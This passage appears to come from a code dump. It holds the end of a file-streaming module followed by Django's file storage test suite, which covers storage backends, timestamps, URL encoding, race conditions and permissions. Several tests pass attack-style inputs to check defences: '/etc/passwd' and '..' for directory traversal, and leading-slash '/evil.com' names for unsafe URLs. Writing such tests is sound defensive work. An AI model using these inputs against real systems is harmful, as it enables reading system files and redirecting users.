exitcode: The exitcode of the watched process.
"""
self._queue.put(self.Finish(exitcode))
self._thread.join()
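# Illustrative usage sketch, not part of the original module. The `api` object
# and run id below are hypothetical stand-ins; the sequence just mirrors what the
# FileStreamApi docstring describes: construct, start the push thread, push
# chunks, then finish with the watched process's exit code.
#
#   fs = FileStreamApi(api, run_id="hypothetical-run")
#   fs.set_default_file_policy("output.log", CRDedupeFilePolicy())
#   fs.start()
#   fs.push("output.log", "first line\n")
#   fs.finish(exitcode=0)   # drains the queue and joins the push thread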
|
tests.py
|
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from pathlib import Path
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import (
FileSystemStorage, Storage as BaseStorage, default_storage,
get_storage_class,
)
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models import FileField
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import (
Storage, callable_storage, temp_storage, temp_storage_location,
)
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import doesn't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonexistentStorage')
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class doesn't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonexistentStorage')
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module doesn't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, ())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
An empty location falls back to the process's current working directory.
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like the encodeURIComponent() JavaScript function does
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
self.addCleanup(self.storage.delete, 'storage_test_1')
self.addCleanup(self.storage.delete, 'storage_test_2')
for directory in ('', Path('')):
with self.subTest(directory=directory):
dirs, files = self.storage.listdir(directory)
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path, mode=0o777, exist_ok=False):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path, mode, exist_ok)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path, mode, exist_ok)
if not exist_ok:
raise FileExistsError()
elif path == os.path.join(self.temp_dir, 'error'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Exceptions aside from FileExistsError are raised.
with self.assertRaises(PermissionError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error.file'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(PermissionError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise OSError
f1.chunks = failing_chunks
with self.assertRaises(OSError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
msg = 'The name must be given to delete().'
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete(None)
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete('')
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overridden_media_root',
'MEDIA_URL': '/overridden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
def test_file_methods_pathlib_path(self):
p = Path('test.file')
self.assertFalse(self.storage.exists(p))
f = ContentFile('custom contents')
f_name = self.storage.save(p, f)
# Storage basic methods.
self.assertEqual(self.storage.path(p), os.path.join(self.temp_dir, p))
self.assertEqual(self.storage.size(p), 15)
self.assertEqual(self.storage.url(p), self.storage.base_url + f_name)
with self.storage.open(p) as f:
self.assertEqual(f.read(), b'custom contents')
self.addCleanup(self.storage.delete, p)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
basename, *ext = os.path.splitext(name)
number = 2
while self.exists(name):
name = ''.join([basename, '.', str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class OverwritingStorage(FileSystemStorage):
"""
Overwrite existing files instead of appending a suffix to generate an
unused name.
"""
# Mask out O_EXCL so os.open() doesn't raise OSError if the file exists.
OS_OPEN_FLAGS = FileSystemStorage.OS_OPEN_FLAGS & ~os.O_EXCL
def get_available_name(self, name, max_length=None):
"""Override the effort to find an used name."""
return name
class OverwritingStorageTests(FileStorageTests):
storage_class = OverwritingStorage
def test_save_overwrite_behavior(self):
"""Saving to same file name twice overwrites the first file."""
name = 'test.file'
self.assertFalse(self.storage.exists(name))
content_1 = b'content one'
content_2 = b'second content'
f_1 = ContentFile(content_1)
f_2 = ContentFile(content_2)
stored_name_1 = self.storage.save(name, f_1)
try:
self.assertEqual(stored_name_1, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_1)
stored_name_2 = self.storage.save(name, f_2)
self.assertEqual(stored_name_2, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_2)
finally:
self.storage.delete(name)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename gets truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform == 'win32',
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_pathlib_upload_to(self):
obj = Storage()
obj.pathlib_callable.save('some_file1.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_callable.name, 'bar/some_file1.txt')
obj.pathlib_direct.save('some_file2.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_direct.name, 'bar/some_file2.txt')
obj.random.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as Python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FieldCallableFileStorageTests(SimpleTestCase):
def setUp(self):
self.temp_storage_location = tempfile.mkdtemp(suffix='filefield_callable_storage')
def tearDown(self):
shutil.rmtree(self.temp_storage_location)
def test_callable_base_class_error_raises(self):
class NotStorage:
pass
msg = 'FileField.storage must be a subclass/instance of django.core.files.storage.Storage'
for invalid_type in (NotStorage, str, list, set, tuple):
with self.subTest(invalid_type=invalid_type):
with self.assertRaisesMessage(TypeError, msg):
FileField(storage=invalid_type)
def test_file_field_storage_none_uses_default_storage(self):
self.assertEqual(FileField().storage, default_storage)
def test_callable_function_storage_file_field(self):
storage = FileSystemStorage(location=self.temp_storage_location)
def get_storage():
return storage
obj = FileField(storage=get_storage)
self.assertEqual(obj.storage, storage)
self.assertEqual(obj.storage.location, storage.location)
def test_callable_class_storage_file_field(self):
class GetStorage(FileSystemStorage):
pass
obj = FileField(storage=GetStorage)
self.assertIsInstance(obj.storage, BaseStorage)
def test_callable_storage_file_field_in_model(self):
obj = Storage()
self.assertEqual(obj.storage_callable.storage, temp_storage)
self.assertEqual(obj.storage_callable.storage.location, temp_storage_location)
self.assertIsInstance(obj.storage_callable_class.storage, BaseStorage)
def test_deconstruction(self):
"""
Deconstructing gives the original callable, not the evaluated value.
"""
obj = Storage()
*_, kwargs = obj._meta.get_field('storage_callable').deconstruct()
storage = kwargs['storage']
self.assertIs(storage, callable_storage)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform == 'win32', "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save('the_directory/subdir/the_file', ContentFile('data'))
file_path = Path(self.storage.path(name))
self.assertEqual(file_path.parent.stat().st_mode & 0o777, 0o765)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save('the_directory/subdir/the_file', ContentFile('data'))
file_path = Path(self.storage.path(name))
expected_mode = 0o777 & ~self.umask
self.assertEqual(file_path.parent.stat().st_mode & 0o777, expected_mode)
